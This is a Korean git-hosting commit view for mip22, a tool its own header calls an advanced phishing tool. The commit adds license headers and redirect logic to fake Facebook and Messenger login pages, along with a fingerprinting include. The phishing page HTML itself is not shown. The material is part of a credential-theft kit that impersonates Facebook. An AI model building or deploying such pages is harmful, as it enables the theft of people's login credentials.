소스 검색

Add files via upload

mak 3 년 전
부모
커밋
c6aac6004e
5개의 변경된 파일43개의 추가작업 그리고 13개의 파일을 삭제
  1. 0 1
      .pages/facebook/index.html
  2. 20 0
      .pages/facebook/index.php
  3. 0 0
      .pages/facebook/mobile.html
  4. 0 2
      .pages/facebook_messenger/index.html
  5. 23 10
      .pages/facebook_messenger/index.php

파일 크기가 너무 크기때문에 변경 상태를 표시하지 않습니다.
+ 0 - 1
.pages/facebook/index.html


+ 20 - 0
.pages/facebook/index.php

@@ -1,4 +1,24 @@
 <?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
 include 'fingerprints.php';
 ?>
 

파일 크기가 너무 크기때문에 변경 상태를 표시하지 않습니다.
+ 0 - 0
.pages/facebook/mobile.html


파일 크기가 너무 크기때문에 변경 상태를 표시하지 않습니다.
+ 0 - 2
.pages/facebook_messenger/index.html


+ 23 - 10
.pages/facebook_messenger/index.php

@@ -1,12 +1,25 @@
-<?php 
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
 include 'fingerprints.php';
+header('Location: index.html');
+exit;
 ?>
-
-<script type="text/javascript">
-if (screen.width >= 700) {
-document.location = "index.html";
-}
-else {
-document.location = "mobile.html";
-}
-</script> 

이 변경점에서 너무 많은 파일들이 변경되어 몇몇 파일들은 표시되지 않았습니다.